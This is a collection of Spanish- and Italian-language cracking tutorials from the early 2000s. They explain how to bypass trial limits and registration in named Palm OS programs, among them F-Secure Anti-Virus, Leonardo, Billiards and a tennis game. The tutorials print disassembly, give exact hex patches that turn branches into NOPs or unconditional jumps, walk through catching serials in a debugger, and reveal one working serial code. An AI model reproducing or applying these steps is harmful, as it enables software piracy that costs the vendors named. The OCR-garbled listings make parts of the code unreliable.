($05dc) en la forma en que vimos en los tutoriales anteriores. Pues bien, nos interesaba que hubiese un 
sysTrapFrmAlert justo debajo. Eso nos apareció aquí: 


000020d2 4eba05fe L278 JSR L334 
00002046 3600 MOVE.WDO0,D3 
000020d8 3003 MOVE.WD3,D0 


000020da 673c 
000020dc 5340 
000020de 670a 
000020€0 5340 
000020e2 676c 
000020€e4 5340 
000020€6 6712 
000020e8 6066 
000020ea 3£3c05dc 


000020€ee 4e4fa192 
000020f2 30303039 
000020f6 544f 
000020f8 606a 
000020fa 3£3c000e 
000020fe 4eba0286 
00002102 3600 
00002104 544f 
00002106 6710 
00002108 3£3c05dc 


0000210c 4e4fa192 


L279 


L280 


BEQ L281 

SUBQ.W +1,DO0 

BEQ L279; branch if equal 

SUBQ.W +1,DO0 

BEQ L282 

SUBQ.W +1,DO0 

BEQ L280; branch if equal 

BRA L282 

MOVE.W +t1500!$5dc,-(A7) ; Your evaluation version of FSecure 

Anti-Virus 2.0 has expired. 

sysTrapFrmAlert 

MOVE.W+t12345!$3039,D0 

ADDOQ.W+2,A7 

BRA L283 

MOVE.W ++14!$e,-(A7) 

JSR L310 

MOVE.WDO0,D3 

ADDOQ.W+?2,A7 

BEQ L281 

MOVE.W+1500!$5dc,-(A7) ; Your evaluation version of F-Secure 
Anti-Virus 2.0 has expired. 

sysTrapFrmAlert 


Os señalo el quid de la cuestión en negrita. Como una de las más importantes bazas para ser cracker es la intuición, el 
zen palming (jeje), X -Grimator todo chulo fue y puso un nop en ambos saltos, quedando algo así: 


000020d2 4eba05fe 
000020d6 3600 
000020d8 3003 
000020da 673c 
000020dc 5340 
000020de 4e71 
000020€0 5340 
000020e2 676c 
000020€e4 5340 
000020€6 4e71 


L278 JSR L334 
MOVE.WD0,D3 
MOVE.WD3,DO0 
BEQ L281 
SUBQ.W ++1,D0 
NOP 

SUBQ.W ++1,D0 
BEQ L282 
SUBQ.W ++1,D0 
NOP 


cosa que hizo gracias a un editor hexadecimal, buscando la secuencia 67045340, que me llevó directo a ese trozo de 


código. 


3- En Dakota del Sur alucinan con los europeos: 
Guardo el cambio en el programa y con la chulería que caracteriza a los lamers como yo, le envío el crack al dakotiano, 
o dakotiense o como se llame, y le digo que ya está. El chico lo prueba y le funciona perfectamente. No sólo eliminé la 
primera Talt que nos recordaba que eso era un trial sino que eliminé la que decía que fecha expirada, pues adelantó el 
calendario y todo iba perfecto. Esta vez no os voy a explicar el por qué del crack, baste decir que fue una mezcla de 
intuición y suerte y salió a la primera. Supongo que analizando con más calma la cosa veríamos que el cambio no sólo 
afectó al mensaje de “time expired” sino que por una serie de saltos también afectó al mensaje de inicio. Ver para 
creer... el bueno de mi amigo yanqui no era capaz de creer que en 15 minutos escasitos sacase lo que a él le estaba 
llevando ya 1 hora (y eso que a la vez yo me dedicaba a chatear con mis amigos d e *tcodex del irchispano). 


Ver para creer... asco de trial, asco de crack, asco de tutorial que escribo... ¡¡¿pero alguien puede fiarse de un antivirus 
que está así de protegido?!!... si cuando +0Orc decía “zombi-programmers” lo decía por algo... en fin... y yo con un 
empleo que da grima... 


4- Resumiendo chis -pum punto final: 

Acabamos de reventar un trial sin comerlo ni beberlo. Bueno, sirva pues este tutorial como alivio a mi silencio temporal 
y alos últimos, que fueron más complicados. Lo que conseguimos fue: un yanqui de Dakota con los ojos como platos 
(ojiplático) de mi velocidad crackeando, un antivirus que nos dice que no tenemos virus (ja ja, tú fíate de la Virgen pero 
por si acaso no corras...), y X -Grimator con un poco de suerte por una vez en su vida (quedé como un gurú del crack 
ante el chico). ¡Ah! y tú, lector, con cara de haba de ver un crack tan tonto y un tuto igual de tonto. 


Hasta otra. 
X-Grimator; UE 01/09/02 
“Pensad, pensad. Siempre pensad...” 


Saludos especiales a ablaze y TaeBo-, por ser mis dos primeros alumnos extanjeros y admirarme, que eso siempre 
gusta. También a InLimbo por su ayuda programando, a Sunevil por ser el primero en creer en mí y a todo Disidents 
por apoyarme cuando lo necesitaba y hacer algo serio y con futuro esto de los estudios de seguridad en los programas 
(entre ellos, w3ndig0, wendell, remains, S-P-A-R-K, LuZZer, )-XpyXt-[, Low, FEAR, etc etc...) ¡ah! y Marconi y 
Ziritione por ser, sencillamente, tan majos. eSn-mIn, olvidarme de ti sería, sencillamente, un insulto a la comunidad 
cracker. 
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Descripcion: Encontrar serial de un programa de diseño estilo Paint pero en la Palm 
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DOWNLOAD: http: //www.PaginaWeb.com 


Herramientas: SouthDebugger, PRCedit, PilotDis. POSE Palm emulator, 


Palm CRACKER: X-Grimator W/31/02/2005 


INTRODUCCION 


EL TIEMPO SE ESCURRIA ENTRE LOS DEDOS COMO GRANOS 
DE ARENA... 


AL ATAQUE 


1- Introducción: 

Un buen día, como todos, te levantas de la cama y notas algo nuevo y raro. Observándote mejor en el espejo 

te das cuenta de que las cosas cambian. Hace unos años no estabas calvo, ni tenías esa barriga, ni si quiera te importaba 
cómo estaba la economía del país. Pero ahora eso forma de tu día a día ¿verdad?. Pobre infeliz, el tiempo pasa y es algo 
de lo que nos debemos dar cuenta. Pero ¡no te preocupes! es aquí y ahora como te vamos a enseñar a vencer el tiempo. 
Hombre, nadie te libra de las arrugas alrededor de los ojos, pero ¡que caray! un trial lo saltamos como queremos je je... 


2- Breve introducción teórica del trial como protección: 

Una mierda. Con eso llega. 

Je je, bueno, vamos a matizar un poco más esto. El trial es un sistema de protección basado en el uso de un programa 
durante un cierto tiempo limitado. Pasado el período de prueba, el programa no funcionará a menos que sea registrado. 
Correcto. Pero este tipo de protección por sí sola es pobre, ya que reventando el “contador” de tiempo, todo se viene 
abajo. Generalmente el contador es del tipo compara algo con un número, si ese algo es mayor, aún estamos en período 
de prueba, en caso contrario, no. Os imaginaréis que se trata de alterar eso ¿cierto?. 


3- Brain Storming, vamos allá: 

Bueno, el programa en cuestión se llama Leonardo 1.0 y acaba de salir al mercado. Es un programa, creo, para dibujar 
en la palm vectorialmente, como el Corel para Pc vamos. Personalmente, admito que ni lo he probado. A X-Grimator 
no le interesa ni uno de los programas que ha crackeado, os lo juro, pero ¡es que es tan divertido!... Tengo entendido 


Sin ánimo de repetirme (si te has perdido, te recomiendo leer los anteriores tutos para saber qué vamos a decir de aquí 
en adelante), abrimos el .pre con PreExplorer y buscamos referencias interesantes. En nuestro caso nos 
interesan: 


- Tform ++4400 ($1130): el mensaje de Good Boy (uish, que emocionante...). 

- Tform 44100 ($1004): mensaje de bienvenida diciendo los días que faltan aún del trial. 

- Tform 44050 ($fd2): otro mensajito odioso diciendo que el trial comienza. 

- Tform 44200 ($fa0): una pantalla para meter el serial puesto que ya nos finalizó el plazo del trial. 

- Talt +1018 ($3fa): mensaje Bad Boy, ese no es el serial que te corresponde, morirás por esto :0). 

- Talt ++1017 ($319): mensaje “Introduce un código, tonto”...¡¡cómo!! bueno, esto es demasiado... pagar por un programa 
y si tienes un despiste ¡te insultan!... santo Dios, nunca había visto esto antes...¡¡perros, merecéis un crack como una 
catedral!. Ya me he enfadado...>:o( 


Además, esto es una chapuza de programa ¿dónde se ha visto una colección tal de mensajes de “te queda tanto tiempo”, 
»”»” ¿ »”»” <¿ »”»” ¿ 


“te ha caducado”, “te ha expirado”, “te ha vencido el plazo”, “ya no te queda tiempo”...¡que nos hemos dado cuenta, 
desagradable!. Vamos a poner bien esta porquería de programa que sólo el Dios de los Infiernos sabe lo que valdrá... 


4- Primeros pasos contra nuestro reloj: 
Descompilamos el .pre con pre2bin y luego con PilotDis desensamblamos code0001.bin y siguientes (nota: el code0000 


no nos interesa, como dije en otras ocasiones, ya que es el de sistema e igual para todos los programas. PilotDis nos 
dará un error de desensamblado en el, creo, code0005.bin. Aunque al principio me escamó mucho, al final resulta del 
todo irrelevante). Uau, qué alegría más grande, esto va viento en popa... Tomamos el code0001.bin.s, que es el principal 
del programa, y abriéndolo con un block de notas buscamos “$1130” que no es ni más ni menos que nuestro amado 
Good Boy. Nos encontramos con esto: 


00001bbe 508f ADDQ.LL +8,A7; corrige la pila 

00001bc0 024000ff ANDIW +255!$ff,DO 

00001bc4 663a BNE L198; hummm... 

00001bc6 42a7 CLR.L -(A7) 

00001bc8 4e4fa1c1 sysTrapMenuEraseStatus 

00001bcc 3£3c1130 MOVE.W ++4400!$1130,-(A7)? Good boy 
00001bd0 4e4fa16f sysTrapFrmInitForm 

00001bd4 2608 MOVE.LL A0,D3 

00001bd6 2103 MOVE.L D3,-(A7) 

00001bd8 4e4fa193 sysTrapFrmDoDialog 

00001bdc 2f03 MOVE.L D3,-(A7) 

00001bde 4e4fa170 sysTrapFrmDeleteForm 

00001be2 1£3c0001 MOVE.B +t1,-(A7) 

00001be6 3£3c000c MOVE.W ++12!$c,-(A7) 

00001bea 2f05 MOVE.L DS5,-(A7) 

00001bec 3£3c0001 MOVE.W ++1,-(A7) 

00001bf0 4267 CLR.W -(A7) 

00001bf2 2f3c774c6572 MOVE.L +2001495410!$774c6572,-(A7) 
00001bf8 4e4fa2d4 sysTrapPrefSetAppPreferences 

00001bfc 6000001e BRA L201 

00001c00 4a40 198 — TST.W DO 

00001c02 6d18 BLT L201 

00001c04 00400002 CMPI.W +2,D0 

00001c08 6e12 BGT L201 

00001c0a 3£3c03fa MOVE.W ++1018!$3fa,-(A7)? Bad Boy 
00001c0e 60000006 BRA L200 

00001c12 313c03f9 L199 MOVE.W +t1017!$3f9,-(A7)? ¡Eres tonto! 


00001c16 4e4fa192 L200 sysTrapFrmAlert 


Bueno, la solución no parece difícil cierto es, nos vamos de lleno a 


00001bc4 663a BNE L198 

Y lo cambiamos por un amado NOP, que como sabemos significa “no operation” y que se limita a regalar unos cuantos 
ciclos de reloj. De esta manera, el salto se va a tomar viento y el código continúa hacia el mensaje de Chico Bueno y no 
a los desagradables de Chico Tonto o Chico Malo. 

Cogemos nuestro editor hexadecimal preferido (son todos iguales, todos valen) y cambiamos 663a por 4e71 que es el 
opcode de NOP. De esta forma, el branch not equal deja de estar operativo. Y felices y contentos, cargamos de nuevo el 


programa, vamos a Register, y damos a aceptar sin meter ningún número y ¡ops! mensaje Chico Tonto. Pues hay que 
meter un número, parece ser... Bueno, ponemos algo propio de crackers “666” y al darle a OK nos sale el precioso 
mensajito de Good Boy. Hummm, qué deliciosa es la victoria... huele a Napalm, como en Apocalipsys Now, je je... 


5- Desagradable sorpresa con esta máquina japonesa: 

Je, tendría que empezar a escribir tutos rimando... 30 días después de nuestra proeza, resulta que vamos a usar nuestro 
programa y ¡horror! nos sale el Tform que nos pide un numerito ya que nos ha caducado el trial... pero bueno ¡esto es 
un abuso, un escándalo!... si hemos hecho un crack más chapucero aún que el programa... que vergilenza, en el tutorial 
8 y con estas cosas... ufff... Me temo que tendremos que buscar el Trial check y atacar la función que calcula el paso 
del tiempo. A ver cómo lo hacemos. 

Después de estudiarme la API de PalmOs, me incliné por buscar una SysTrap llamada SysTrapDateToDays, que no 
suena nada pero nada mal. Ok. Nos vamos al code0001.bin.s y lo buscamos ahí, encontrándonos con esto: 


000016bc 362efff6  L180 


MOVE.W -10(A6),D3 


000016c0 3d6effb2fff6 MOVE.W -78(A6),-10(A6) 

000016c6 4a2effff TST.B -1(A6) 

000016ca 6622 BNE L181 

000016cc 3f2effb2 MOVE.W -78(A6),-(A7) 

00001600 4e4fa263 sysTrapDateToDays 

000016d4 2800 MOVE.LL DO0,D4 

000016d6 3f2efff4 MOVE.W -12(A6),-(A7) 

000016da 4e4fa263 sysTrapDateToDays 

000016de 9880 SUB.L DO0,D4; D4 es la fecha actual y DO la inicial 
000016e0 588f ADDQ.L +4,A7 

000016e2 701d MOVEO +t29,D0; ¿29 días? 

000016e4 b084 CMP.L D4,DO; D4 son los días que llevo de trial 
000016€e6 6c06 BGE L18L1; vaya vaya... 


000016e8 1d47c0001ffff 
000016ee 1f3c0001 L181 


MOVEB +1,-1(A6) 
MOVEB +1,-(A7) 


000016f2 3£3c000c MOVE.W ++12!$c,-(A7) 
000016f6 2f06 MOVE,L D6,-(A7) 

0000168 3£3c0001 MOVE.W ++1,-(A7) 

000016fc 4267 CLR.W -(A7) 

000016fe 2f3c774c6572 MOVE.L +2001495410!$774c6572,-(A7) 
00001704 4e4fa2d4 sysTrapPrefSetAppPreferences 
00001708 2107 MOVE.L D7,-(A7) 

0000170a 45fa02e6 LEA L191,A2 

0000170e 4e92 JSR (A2) 

00001710 4fef0014 LEA 20(A7),A7 

00001714 4a00 TST.B DO 

00001716 67000110 BEQ L187 

0000171a 4a2effff TST.B -1(A6) 


0000171e 67000082 BEQ L182 
00001722 42a7 CER.L -(A7) 
00001724 4e4falc1 sysTrapMenuEraseStatus 


00001728 3£3c1068 MOVE.W ++4200!$1068,-(A7); mensaje “fin trial mete numero” En este batiburrillo de 
código lo interesante os lo he señalado, como siempre, en negrita. Tenemos dos comprobaciones 

de fecha (estos programadores de ahora...), una resta entre fechas, poner DO a 29, una ESTUPENDA comparación y un 
salto Branch Greater or equal. Eso promete ¿eh chicos?. El programa, llegado este punto, saltará si en la comparación 
llevamos menos días que 29, esto es, mientras DO sea mayor o igual a D4 (el contador del día en el que estamos), o sea, 
mientras 29>= a uno, dos, cinco, quince... recordad que en Motorola la sintaxis es fuente? destino, que en este caso sería 
“compara D4 con DO, y si DO es mayor,entonces...”. No parece difícil arreglar el desaguisado. Vamos a hacer que salte 
siempre, resulte lo que resulte de esa comparación. Para ello, meteremos un BRA en vez de un BGE. El opcode de BRA 
es 60, mientras que BGE usa 6c. Con un editor hexa lo arreglamos rápido. Volvemos a instalar el programa crackeado 
(nota importante: es necesario instalar el archivo zenitive.pre para que el programa funcione. Pues bien, sospecho que el 
registro se guarda ahí, así que si no queréis errores extra, volved a instalar este archivo también con el programa 
crackeado), y tras instalarlo, volvemos a registrar. Hasta ahora todo como el primer parche, estupendo. De nuevo 
adelantamos la fecha, y al volver al programa... 


Y al volver al programa... me encuentro el mensaje de bienvenida diciéndome que me faltan —-86 días para que expire el 
trial. Ja ja ja ja... ¡¡debo 86 días antes de que acabe la fecha!! ¿eich? esto parece de los hermanos Marx, que situación 
tan absurda... Bueno, parece que nos falta un último retoque para que esto no nos estorbe... funcionar ya funciona bien, 
pero no es nada elegante, así que vamos a buscar dónde aparece ese mensajito y a parchear una vez más. La basurilla 
esta del trial ya nos está llevando tres parches, buffff... 

Buscando el mensaje, vemos esto 


000017cc b66effb2 L184 CMP.W -78(A6),D3 


000017d0 6756 BEQ L187; nos vamos más allá del Hello! 
000017d2 701e MOVEQ +30,DO0 
000017d4 9084 SUB.L D4,D0 

000017d6 7201 MOVEQ +t1,D1 
000017d8 b280 CMP.L DO,D1 

000017da 6608 BNE L185 

000017dc 41fafe3e LEA L175,A0 

000017€0 60000006 BRA L186 

000017€4 41fafe37 LEA L176,A0 

000017e8 2f08 L186 MOVELL A0O,-(A7) 
000017ea 2f00 MOVE,L DO,-(A7) 
000017ec 41fafe31 LEA L177,A0 

000017f0 2f08 MOVE,L A0O,-(A7) 
000017f2 78b4 MOVEQ +-76,D4 
000017f4 d88e ADD.L A6,D4 

000017f6 2f04 MOVE.L D4,-(A7) 
000017f8 4e4fa2de sysTrapStrPrintF 
000017fc 42a7 CLR.L -(A7) 

000017fe 4e4fa1c1 sysTrapMenuEraseStatus 
00001802 3£3c1004 MOVE.W ++4100!$1004,-(A7) mensaje bienvenida 
00001806 4e4fa16f sysTrapFrmInitForm 


En fin, avezados crackers míos... ya visteis perfectamente qué parchear ¿¿no?. El BEQ que os remarqué evita el mensaje 
de bienvenida, así que vamos a cambiarlo por un BRA precioso con un opcode 60 y un editor hexadecimal cualquiera. 
Ahora esto sí que funciona bien. Santo Cristo, tanta comprobación para un programa que al final no usará nadie. 
Idiosincrasias de la vida, mi fiel Glauco, amigo. 


7- Finalizando esta digresión: 

Antes de que se me olvide, deciros que no inserté imágenes en el tutorial ya que no lo vi necesario. Están bien para 
newbies y son más bonitas, pero ya en la lección 8 no las queremos para nada. 

El tiempo se agota pero está de vuestras manos pararlo con un poco de sabiduría y ganas. Aunque siempre ha sido el 
peor enemigo del ser humano, con conocimientos todo se consigue. Si no, pues cirugía, dietas, tener 60 años e ir vestida 
de quinceañera... francamente, prefiero vencerlo como lo hicimos hoy :0) 


Hemos aprendido a reventar Trial, pero ¡recordad! esto es un crack “sucio” propio de emergencias y lamers, y bueno 
para newbies, pero no es para nada elegante. Nuestro objetivo siguiente es intentar hacer un generador de llaves. Estoy 
en ello, pero el código es una caja de gusanos de aúpa y me llevará tiempo. Queda prometido para la siguiente lección. 


X-Grimator 
UE, 07/09/02 


Un saludo muy especial a 42_beers por soportar mi nefando inglés y orientarme sobre los encriptados y empacados en 
Palm. Estoy aún aprendiendo, pero es mi siguiente objetivo. Eso será ya para nivel muy alto de aprendizaje. Y en 
general un saludo muy grande a todo +Codex y *Disidents del IRC-Hispano, chicos majos donde los haya que tanto me 
animan y se ríen con mis tonterías. 
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Encontrar el serial con algún debugger para palm 


(O) NewBies ( )|ntermedio ( )Avanzado ( ) 


Master ( )Gúru 


www.megasoft2000.com 


SouthDebugger, X-Master 


Palm CRACKER: X-Grimator 


wW/31/02/2005 


INTRODUCCION 
VIKTIMA!!! 


Billiards,juego de billar para Palm OS. Lo podemos descargar de www.megasoft2000.com 


AL ATAQUE 


Para empezar decir que he usado la version en blanco y negro que nos trae el zip puesto que cada vez que queria 


desemsamblar el archivo se me quedaba colgado la PeCera(luego comprobare si ele serial es valido para el resto de 
versiones). bueno pos empezos cargando el southdebugger y abriendo tres ventanas: 


1-ventanita de breakpoints 
2-ventanita de desamblado 
3-ventanita de trap stack (nos servira para ver que datos son comparados) 


A continuacion abriremos nuestro emulador de PAIMOS y cargaremos el X-Master y le dara el paso al debugger; 
marcamos en la ventana de breakpoints la siguiente: 


sysTrapStrCompare 


y le damos a f3 una vez y retornamos al emulador,una vez alli cargamos el juego y nos vamos al menu de registro y 
vemos q nos sale una especie de maquina de escribir para introducir el numero de registro,pos vale,tecleamos lo que 
queramos y le damos a Ok. Una vez hallamos pulsado el boton vamos al debugger y vemos en la ventana de trap stack 
como compara nuestro serial con: 


7JBBGKTCC2JU 


Y CON ESTO Y UN BIZCOCHO ATA EL PROXIMO QUE SERA A LAS 8 

Este es mi 2” tute asi que lo siento por si no me explico bien,pero creo q esta todo bien clarito.El hecho de que 
pierda el tiempo en estas cosas(es broma),se lo debo a mi gran amigo X-GRIMATOR,que siempre me ayuda 
aunque sea un pesado... 

SuNeViL 
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PROTECCION: Serial HotSync 


Descripcion: Encontrar el serial User/ HotSync 


Dificultad: 


(O) NewBies ( )Intermedio ( )Avanzado ( )Master ( )Gúru 


DOWNLOAD: http://www.pda3dware.com/3dtennis.htm 


Herramientas: SouthDebugger, X-Master. POSE Palm emulator, 


INTRODUCCION 
HOW-TO crack in 5 minutes 


AL ATAQUE 


Bueno pos eso,este es mi 3 tuto y como sigo siendo newbie pos encontre una proteccion mu facilita y rapidita 
de paso...pa no poerder tiempo... El progama en cuestion es un juego 3D de tenis no mu bueno la verdad, por 
lo menos para jugar en el emulador...,pero praticar y usar el Southdebugger pues Yelo ke ahi. 


EMPEZEMOS 


Este programita nos da la posibilidad de usarlo durante dies dias(creo recordar)y tras ello deberemos registrarnos 
metiendo un codigo.Para ello nos dirijimos a cargar el juegecito y le damos a register donde nos sale una linea 
subrayada en amarillo y deberemos poner nuestro numero de serie...(puesto que no lo sabemos,o tal vez si) nos servira 
este manual para encontrarlo entre el amasijo de codigo fuente del cual esta formado este juego. 

Pos bueno, empezamos por meter un codigo 


Palrn hotsync username: 
Palm 5 Emulator 


en mi caso introduzco sunevil,le damos a ok y??..... 


Nessage 


Incorract code! 


Please, refer to the 
"Troubleshooting 
section" of the Manual 
on the PC. 
obbhhhhhhhhhhh!!!!!!111!, no pasa nada.Cerramos todo y arrancamos el southdebugger y abrimos tres 
ventanucas: 
Trap stack 
Disasemmbler 
Breakpoints 


A continuacion ejecutamos el POSE y arrancamos el X-master, se colgara todo y nos iremos al debugger y en la 
pantalla de breakpoints buscamos el SystrapStrcompare, luego vamos a la pantallita de disasemmbler, le damos a FS y 
nos volvemos a POSE. Una vez alli cargamos nuestro querido juego y tras volver al debugger y darle una infinidad de 
veces a F5,éste nos devolvera el poder al POSE, pulsamos register y volvemos a darle una infinidad de veces a FS hasta 
que vemos la ventanita de introducir registro. TRas meter el que queramos, le damos a ok y nos pasamos el debugger. 
Observaremos como en la ventana de Trap stack aparece nuestro serial (sunevil en este caso), pues ahora usaremos F8 
para ir de instruccion a instruccion hasta ver en esa panatalla(trap Satck) como compara nuestro serial con un numero y 
luego nos saca la pantalla de chico malo.Tras aver anotado el numero anterior, volvemos al registro y lo introducimos.... 


Nessage 


(1) Successful registration! 
Thanks % please, 


restart. 


Todo esto se puede reducir a unos 3 minutos o menos... 
Darle las gracias de nuevo a mi mentor X-GRIMATOR y espero que me ayude en mi proximo pograma que 


ya toi atascado... 
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A 
X)NewBies ( )Intermedio ( )Avanzado ( ) Master ( )Gúru 

http://www. PaginaWeb.com 

SouthDebugger, X-Master. POSE Palm emulator,PilotDis,Prc2bin,PRCedit 

natos FECHA:  1/31/02/2005 


INTRODUCCION 


CRACKME 1 +X-GRIMATOR 

He decidido hacer este tuto sobre el crackme de X-GRIMATOR porque asi la gente que como yo no tenemos 
ni idea sobre el tema de ingenieria inversa en Palm OS nos ayude un poco mas y seamos mas y podamos 
aprender mucho mas (valga la rebuznancia). 


AL ATAQUE 
EMPEZEMOS 


Herramientas a utilizar: 

POSE--->emulador de Palm para windows 

SouthDebugger--->Potente debugger para Palm 

X-Master--->( "mejorador de escritorio")Nuse muy bien lo que es pero creo que es para hacer saltar el debugger 
PilotDis--->Desemsamblador para Palm 

Prc2bin--->Pos eso,para pasar de archivos .pre(de palm) a una serie de archivos leibles por nosotros 

PRCedit--->Nos dara datos mu importantes sobre el programa 

HEX--->Editor hexadecimal 

Tecnicas de atake!!!! 


1*”-PARCHEO 

Ejecutamos el emulador y cargamos el crackmel ¡introducimos un NAME y un SERIAL y le damos a GET IT! sino 
introducimos el correcto nos aparecera la siguiente pantalla... 

A continuacion abrimos el crackme.pre con el preedit y observamos que podemos ver los menajes de texto que nos 
aparecen en el crackme... 


¡Crackane 1 MEMO 


Hi, vou have to crack itif you want to 
be a genial cracker in future... 
EU, 2408/02 

Enter your User Nome, please 


HMIi= á 
We know what you're doing... 


A You, son of a bitch, Buy 


my program! 


ID 1001--- Chico malo ("You, son of a bitch, Buy my program!”) 


ID 1002--- Chico bueno ("Well, you have paid for a program that do nothing! nl like customers like 

you, he, he, he...$$$$$$$$$$nand... you discovered the day of my birth... :0)") 

Luego de observar los ID,los apuntamos y nos vamos a MSDOS y ponemos la siguiente linea: 

pre2bin crackmel pre y nos crreara en el mismo directiorio una serie de archivos de los cuales solo nos importara 
code0001.bin si observamos podemos ver diversas Talt que son mensajes dentro del programa,nos interesara Talt03e9. 
bin porque guarda el mesaje de niño malo... 


Ahora volvemos a MSDOS y ponemos la siguiente linea: 
pilotdis code0001.bin 


y nos creara otro archivo llamado code0001.bin.s,el cual podremos abrirlo con el notepad(o similar).Ahora es el 
momento de destripar el .bin.s... 

Buscamos ID 1001(que guarda el mensaje de niño malo): 

Aparecemos aqui 


0000043a 3£3c03e9 L31 MOVE.W ++1001!$3€9,-(A7) 


Subimos un poco hacia arriba hasta encontrar una instruccion que compare mi serial con el verdadero... 
miramos y... 10 lineas mas arriba tenemos: 


sysTrapStrCompare 
leyendo un poco de codigo nos encontramos con... 
CMP.W D4,D3<----compara nuestro serial con el verdadero 


BNE L31<----salta si son diferentes al mensaje de chico malo 


ahora cojeremos el HEXeditor y tranformaremos ese salto para que no lo haga y pase al mensaje de chico bueno 
insertando 4e71 en el lugar del salto. 


2"-PILLAR EL SERIAL AL VUELO!! 
Bueno,aqui nos metemos ya en cosas mas seeerias..., primeramente ejecutamos el southdebugger y abrimos una ventana 


de breakpoints, otra para desamblar y una una trap stack window(que nos servira para poder ver los datoe 
introducidos)...;acto seguido ejecutamos nuestro emulador y cargamos el X-Master. Si miramos el south debuger,nos 
vamos a la ventana de breakpoints y nos saldra una lista de los que podemos marcar. Puesto que este tipo de proteccion 
se basa en comparar dos numeros,buscaremos 


sysTrapStrCompare... 


luego en la pestaña de trap breakpoints, la marcaremos,le damos a f5 pa continuar y nos vamos a cargar el crackme... 
Introducimos como name sunevil(en mi caso) y como serial 123456789,al darle a get it,se blokeara y le dara el poder a 
southdebugger...podemos observar que en la trap window vemos lo siguiente 


ODOIBGBI 123456709 
IDON4DI4A 1300773 


DIOSSS5SSSSSSS!!!!compara nuestro serial (123456789) con otro numero(300773),cerramos todo,volvemos a 
introducir como serial ese numero y ZASSSSSSSSS,sabemos la fecha de naciemiento de su autor y el progrma 
"registrado". 

Tras esto darle las gracias a X-GRIMATOR,autor de la crackme por toa su ayuda porque puedo asegurar que yo sol 
muy pesado y por todo lo que me enseña y que siga haciendo mas crackmes... 
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X)NewBies ( )|ntermedio ( )Avanzato ( )Master 


INTRODUCCION 
Mitico, la cosa del PalmOS mi sta iniziando a gustare, bella pincuzzo hai spiegato in modo 


AL ATAQUE 


Troveremi il seriale esatto per registrarci per questo gioco sotto PlamoOs, e il mio mio primo tute sui 
PalmOS quindi incrociamo le dite :-) 


Willy! for PalmOS 
Serial Fishing under PalmOS Written by Pincopall 


Introduzione 


Dunque, il gioco € uno shareware che offre possibilita di gioco fino al decimo livello, per andare oltre 
bisogna essere registrati, e per registrarsi ci vuole..ma pensate un po'..un serial che nn siii basa ne su 
un nome né su altro ma é per cosi dire...fisso :-) 


Tools usati 


PilotDis -- Un disassemblatore 

Prc2Bin --- separa le varie funzioni del programma in files Serve per individuare form e di 
conseguenza i punti dove vengono richiamate. 

Notepad --- o qualcosa di simile...credo ce lo abbiate tutti :-) 

Un emulatore per Palmare --- ¡o ho usato il POSE 


SE non avete un Palmare...la ROM di un Palmare...i¡o usato quella di Pastorez :-) 


URL o FTP del programma 
http: //volftp.mondadori.com , io l'ho trovato qui :-) 


Notizie sul programma 


Dicono di lui : "Ispirato ai classici arcade come Manic Miner e PitFall, WILLY! e' un gioco in grado di 


portare tutto il divertimento di un platform sullo schermo del proprio palmare. Pertanto saltare, 
inchinarsi, evitare ¡ mostri e collezionare monete e chiavi saranno gli obbiettivi del gioco. 25 ¡ livelli che 
mettono a dura prova ¡ vostri riflessi. " 


Essay 


Ok, come avrete capito dalla frase sopra ¡o..non ho un palmare :-(...gia ma allora perkée 
reversare sotto PalmOS se tanto non ti servira ..bhée perche...é una sfida nuova, diciamo..per 
l'ebrezza di sentirmi un pioniere pur sapendo di nn esserlo :-)) e poi, come si dice nel 
disclaimer..noi reversiamo per il solo gusto di reversare, e quindi eccomi qua :-) 

Ma bando alle ciance e cominciamo. 

Dunque, dopo esserci scaricati il gioco ed averlo caricato nel nostro emulatore per palmare, 
notiamo subito un noioso nag screen ke ci informa del fatto che questo gioco e shareware e che 
va registrato, bene, dunque clikkiamo "Chiudi" e via..entriamo nel gioco, da qui entriamo, 
clikkando su "Willy- Options - Register" nel box ke ci chiede il serial, proviamo a metterne uno a 
caso ed ovviamente, a meno di una mostruosa botta di culo :-), il gioco ci dirá ke il serial e 
errato e ci preghera di ritentare.. uff. .vabbe. .vediamo ke si puo fare : 

Cominciamo con l'usare il Prc2Bin, in modo da vedere le resources del nostro giokino, dunque 
dal prompt di Dos, ricordandovi di Copiare - Incollare il file willy.prc nella stessa dir di Prc2Bin, 
andiamo in tale dir e scriviamo " pre2bin willy.prc ", questo creerá un mukkio di files ad 
estensione .bin nellla nostra dir. E per ora lasciamoli stare. 

Usiamo ora il disassemblatore vero e proprio, ovvero il PilotDis, anke qui dopo aver copiato - 
incollato il file willy.prc nella dir di PilotDis andiamo nel Prompt del Dos, e, stando nella dir di 
PilotDis, digitiamo "PilotDis willy.prc", questo creera nella nostra dir il file willy.prc.s , apriamo 
questo file con il notepad, o con l'editor di testo ke volete e vediamo che si tratta di un 
disassemblato..e bhe certo, sennó ke razza di disassemblatore avremmo usato? :-). 

Gia ma..non sappiamo che dobbiamo cercare.. 

Bhe, vi ricordate di tutti quei files .bin che abbiamo nella dir di prc2bin? bene, cominciamo ad 
aprirli uno per uno con il nostro notepad finche non troviamo quello con dentro la scritta che 
viene riportata nella beggar off che ci dice che abbiamo inserito un serial errato. 1! file con 
dentro tale scritta, vedrete essere Talt0420.bin . 

Ok, ora andiamo nel nostro disassemblato e cerkiamo la stringa "0420", come vedete ce ne sono 
diverse, ma non troppe, e quella che a noi interessa e questa, in quanto vediamo che 
corrisponde ad una MessageBox, che e poi quella ke kontiene il messaggio d'errore : 


00002cb8 
00002cbca 
00002cbe 
00002cc2 
00002cc6 
00002cca 
00002cce 
00002cd2 
00002cd6 
00002cd8 


4a28000b 
6610 

6100e5fe 
41ec0088 
214003cc 
6000000a 
3f3c0420 
4e4fal92 
debe 

de75 


L235 


L236 


TST.B 11(A0) --- Se non sono uguali 

BNE 1235 --- Salta alla msg box d'errore 

BSR L73 --- Chiamata alla subroutine 173 

LEA 136(A4),A0 

MOVE .L D0,972(A0) 

BRA L236 ---Con questo salto inc. si salta la msg box 

MOVE .W $1056!$420,-(A7) Questa la Msg Box 
sysTrapFrmAlert 

UNLK A6-- se il BRA 1236 viene eseguito s'arriva qui 
RTS 


Ok, dunque vediamo ke alla beggar off ci s'arriva se quel BNE ( jump if not equal ) salta, se non salta 
si arriva dopo una call all'esecuzione del salto incondizionato BRA L236 che ci porta oltre la 
messagebox. Dunque basterebbe patchare quel BNE, si ma...guardate sopra, ci sono tutta un'altra 
serie di compare kon relativi BNE L235, eccoli qua : 


00002c62 0c100077 CMPI $+119!$77, (A0) --- Gaurdate questi compare 
